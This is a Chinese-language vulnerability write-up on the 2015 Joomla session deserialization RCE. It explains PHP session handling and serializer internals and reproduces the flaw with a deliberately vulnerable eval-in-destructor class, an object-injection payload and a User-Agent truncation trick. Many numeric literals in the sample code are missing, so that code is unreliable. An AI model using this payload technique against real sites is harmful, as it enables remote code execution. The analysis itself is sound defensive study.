catalog

. 漏洞描述

. PHP SESSION持久化

. PHP 序列化/反序列化内核实现

. 漏洞代码分析

. POC构造技巧

. 防御方案

. Code Pathc方案

1. 漏洞描述

Joomla在处理SESSION序列化数据的时候,对序列化格式未进行严格规范,导致攻击者可以构造畸形HTTP包,实现对象注入

Relevant Link:

https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html

http://www.freebuf.com/vuls/89599.html

2. PHP SESSION持久化

0x1: Session简介

会话支持在 PHP 中是在并发访问时由一个方法来保存某些数据.从而使你能够构建更多的定制程序 从而提高你的 web 网站的吸引力.
一个访问者访问你的 web 网站将被分配一个唯一的 id, 就是所谓的会话 id. 这个 id 可以存储在用户端的一个 cookie 中,也可以通过 URL 进行传递.
会话支持允许你将请求中的数据保存在超全局数组$_SESSION中. 当一个访问者访问你的网站,PHP 将自动检查(如果 session.auto_start 被设置为 1)或者在你要求下检查(明确通过 session_start() 或者隐式通过 session_register()) 当前会话 id 是否是先前发送的请求创建. 如果是这种情况, 那么先前保存的环境将被重建.

$_SESSION (和所有已注册得变量) 将被 PHP 使用内置的序列化方法在请求完成时 进行序列化.序列化方法可以通过 session.serialize_handler 这个 PHP 配置选项中来设置一个指定的方法.注册的变量未定义将被标记为未定义.在并发访问时,这些变量不会被会话模块 定义除非用户后来定义了它们.

0x2: The SessionHandler class

SessionHandler is a special class that can be used to expose the current internal PHP session save handler by inheritance. There are seven methods which wrap the seven internal session save handler callbacks

. open

. close

. read

. write

. destroy

. gc

. create_sid

By default, this class will wrap whatever internal save handler is set as defined by the session.save_handler configuration directive which is usually files by default. Other internal session save handlers are provided by PHP extensions such as SQLite (as sqlite), Memcache (as memcache), and Memcached (as memcached).

<?php

    echo ini_get('session.save_handler');

?>

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAF0AAAAuCAIAAADFpYL7AAAAyUlEQVRoge3X0Q7EEBQAUf//0/oqNW4RQZM5j1a7THSbTVkknV7ApezC7MLswuzC7MLswrq6pEI50pq2eI0nfO+h3GfcpZ7/X2Nduu5olyXz7xTtIVVe462r4lsFXzG7i/Xmz0v/eN0iHr/Bpi6tczey1K0OnJfXRxc+RPl4l4lpe/j7wgbeR9PjufG8XPsyyv4/arELswuzC7MLswuzC7MLswuzC7MLswuzC7MLswuzC7MLswuzC7MLswuzC7MLswuzC7MLswt7AG4KzdXmDAHzAAAAAElFTkSuQmCC" alt="" />

When a plain instance of SessionHandler is set as the save handler using session_set_save_handler() it will wrap the current save handlers. A class extending from SessionHandler allows you to override the methods or intercept or filter them by calls the parent class methods which ultimately wrap the interal PHP session handlers.
This allows you, for example, to intercept the read and write methods to encrypt/decrypt the session data and then pass the result to and from the parent class. Alternatively one might chose to entirely override a method like the garbage collection callback gc.
Because the SessionHandler wraps the current internal save handler methods, the above example of encryption can be applied to any internal save handler without having to know the internals of the handlers.

<?php

 /**

  * decrypt AES 256

  *

  * @param data $edata

  * @param string $password

  * @return decrypted data

  */

function decrypt($edata, $password) {

    $data = base64_decode($edata);

    $salt = substr($data, , );

    $ct = substr($data, );

    $rounds = ; // depends on key length

    $data00 = $password.$salt;

    $hash = array();

    $hash[] = hash('sha256', $data00, true);

    $result = $hash[];

    for ($i = ; $i < $rounds; $i++) {

        $hash[$i] = hash('sha256', $hash[$i - ].$data00, true);

        $result .= $hash[$i];

    }

    $key = substr($result, , );

    $iv  = substr($result, ,);

    return openssl_decrypt($ct, 'AES-256-CBC', $key, true, $iv);

  }

/**

 * crypt AES 256

 *

 * @param data $data

 * @param string $password

 * @return base64 encrypted data

 */

function encrypt($data, $password) {

    // Set a random salt

    $salt = openssl_random_pseudo_bytes();

    $salted = '';

    $dx = '';

    // Salt the key(32) and iv(16) = 48

    while (strlen($salted) < ) {

      $dx = hash('sha256', $dx.$password.$salt, true);

      $salted .= $dx;

    }

    $key = substr($salted, , );

    $iv  = substr($salted, ,);

    $encrypted_data = openssl_encrypt($data, 'AES-256-CBC', $key, true, $iv);

    return base64_encode($salt . $encrypted_data);

}

class EncryptedSessionHandler extends SessionHandler

{

    private $key;

    public function __construct($key)

    {

        $this->key = $key;

    }

    public function read($id)

    {

        $data = parent::read($id);

        var_dump($data);

        if (!$data) {

            return "";

        } else {

            return decrypt($data, $this->key);

        }

    }

    public function write($id, $data)

    {

        $data = encrypt($data, $this->key);

        return parent::write($id, $data);

    }

}

// we'll intercept the native 'files' handler, but will equally work

// with other internal native handlers like 'sqlite', 'memcache' or 'memcached'

// which are provided by PHP extensions.

ini_set('session.save_handler', 'files');

$key = 'secret_string';

$handler = new EncryptedSessionHandler($key);

session_set_save_handler($handler, true);

session_start();

$_SESSION['OP'] = "HE;L";

var_dump($_SESSION);

?>

aaarticlea/png;base64,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" alt="" />

aaarticlea/png;base64,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" alt="" />

这里需要明白的是,PHP的SESSION持久化和serialize序列化是两个完全独立的东西,SESSION化(包括自定义SESSION化方案)本质上只是定义了一套算法,用于将超全局变量$_SESSION中的值本地持久化到第三方存储中(例如磁盘文件)
而序列化本质上是一种编码转换方式,因为序列化的设计初衷就是为了网络传输、持久化存储,因为序列化的这个特性,序列化被默认用在了PHP的SESSION本地化中,综上,PHP的SESSION本地化流程是

//session存储

. PHP对$_SESSION中值进行serialize进行序列化,返回$result

. PHP调用用户自定义的write函数对$result进行自定义算法处理

. 持久化存储

//$_SESSION['OP'] = HE;L -> OP|s:4:"HE;L"; -> T1B8czo0OiJIRTtMIjs=

//session加载

. 从持久化中读取字符串,$input

. PHP调用用户自定义的read函数对$input进行算法处理

. 在取$_SESSION值的时候,PHP自动对上一步结果进行反序列化处理

//T1B8czo0OiJIRTtMIjs -> OP|s:4:"HE;L"; -> $_SESSION['OP'] = HE;L

Relevant Link:

http://php.net/manual/zh/intro.session.php

http://php.net/manual/zh/class.sessionhandler.php

http://drops.wooyun.org/tips/3909

http://bobao.360.cn/learning/detail/2499.html

http://weibo.com/p/1001603920354568452417

http://php.net/manual/zh/function.session-set-save-handler.php

3. PHP 序列化/反序列化内核实现

\php-src-master\ext\session\session.c

#define PS_DELIMITER '|'

#define PS_UNDEF_MARKER '!'

PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */

{

    const char *p, *q;

    const char *endptr = val + vallen;

    zval current;

    int has_value;

    int namelen;

    zend_string *name;

    php_unserialize_data_t var_hash;

    PHP_VAR_UNSERIALIZE_INIT(var_hash);

    p = val;

    while (p < endptr)

    {

        zval *tmp;

        q = p;

        //搜索序列化的定界符"|"的位置

        while (*q != PS_DELIMITER)

        {

            //逐字符搜索到序列化字符串结尾

            if (++q >= endptr) goto break_outer_loop;

        }

        //PS_UNDEF_MARKER = '!'

        if (p[] == PS_UNDEF_MARKER)

        {

            p++;

            has_value = ;

        }

        else

        {

            has_value = ;

        }

        //p代表从本次搜索的开始位置,q -p即代表"|"之前的键名

        namelen = q - p;

        //获取键名

        name = zend_string_init(p, namelen, );

        q++;

        if ((tmp = zend_hash_find(&EG(symbol_table), name)))

        {

            if ((Z_TYPE_P(tmp) == IS_ARRAY && Z_ARRVAL_P(tmp) == &EG(symbol_table)) || tmp == &PS(http_session_vars))

            {

                goto skip;

            }

        }

        if (has_value)

        {

            ZVAL_UNDEF(&current);

            //调用php_var_unserialize进行key-value解析

            if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash))

            {

                zval *zv = php_set_session_var(name, &current, &var_hash);

                var_replace(&var_hash, &current, zv);

            }

            else

            {

                zval_ptr_dtor(&current);

            }

        }

        PS_ADD_VARL(name);

skip:

        zend_string_release(name);

        p = q;

    }

break_outer_loop:

    PHP_VAR_UNSERIALIZE_DESTROY(var_hash);

    return SUCCESS;

}

/* }}} */

继续跟进php_var_unserialize函数,我们关注关键代码逻辑
\php-src-master\ext\standard\var_unserializer.c

/*

指针依次移动反序列化数据,当解析到如下数据的时候: 130:"_test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}

len = parse_uiv(start + 2);通过parase_uiv获取130这个值给len

*/

len2 = len = parse_uiv(start + );

/*

maxlen = max - YYCURSOR;

获取当前指针以后数据的长度

*/

maxlen = max - YYCURSOR;

if (maxlen < len || len == )

{

    *p = start + ;

    return ;

}

//这样,此时if判断成功,进入内部语句,使得反序列化失败返回0,而我们的指针p指向上一次解析的结尾

php_var_unserialize返回0,

if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash TSRMLS_CC))

{

    php_set_session_var(name, namelen, current, &var_hash  TSRMLS_CC);

}

zval_ptr_dtor(&current);

efree(name);

p = q;

注销当前变量,p = q;进入下一个循环,继续寻找"|",这个时候会把我们注入的test|当成一个key值

总结一下这个漏洞的利用成因

. joomla使用自定义的SESSION持久化方案将SESSION数据保存到Mysql数据库中

. joomla会将HTTP数据包中的HTTP_USER_AGENT、HTTP_X_FORWARDED_FOR保存到SESSION超全局变量中,并进行持久化

. 攻击者在包含HTTP_USER_AGENT的攻击包中使用了2个关键性因素

    ) "|"(key-value分隔符): }__test|O::"JData

    ) 截断字符: }__test|O::"JData...ð(%F0%9D%8C%86)

. 攻击者在二次回访的时候,joomla的$browser = $this->get('session.client.browser');会从数据库中读取SESSION数据,并尝试进行反序列化

. ð(%F0%9D%8C%)被会Mysql识别为截断字符,即当攻击者的HTTP包中包含这种字符,会导致之后的内容遭到截断

. 因为截断字符的关系,导致PHP内核在解析session.client.forwarded后面字符串的时候,因为长度Check不一致,导致php_var_unserialize提前退出,返回false

. PHP在上一次php_var_unserialize失败的时候,会从之前的指针位置继续开始下一轮key-value尝试

. 在下一轮key-value尝试中,PHP内核将攻击者注入的"|"当成了分隔符,进行key-value解析,导致对象注入

0x1: 非Joomla场景复现

为了模拟出同样的畸形字符串解析问题,我们来构造如下代码

<?php

class Example

{

   var $var = '';

   function __destruct()

   {

      eval($this->var);

   }

}

session_start();

ini_set('session.save_handler', 'files'); 

$_SESSION['prefix'] = 'hello';

$_SESSION['pyaload'] = '_test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}';

$_SESSION['after'] = 'alibaba';

var_dump($_SESSION);

?>

访问后,我们手工修复磁盘上的SESSOIN持久化文件,主动触发PHP的畸形解析

/*

1. 删除原本phpinfo();";}后面的双引号,以及之后的所有内容,模拟Mysql的特殊字符截断

2. 修改pyaload|s:..之后的长度为130,远超过原本的70,使之满足长度不符合的条件

*/

prefix|s::"hello";pyaload|s::"_test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}

aaarticlea/png;base64,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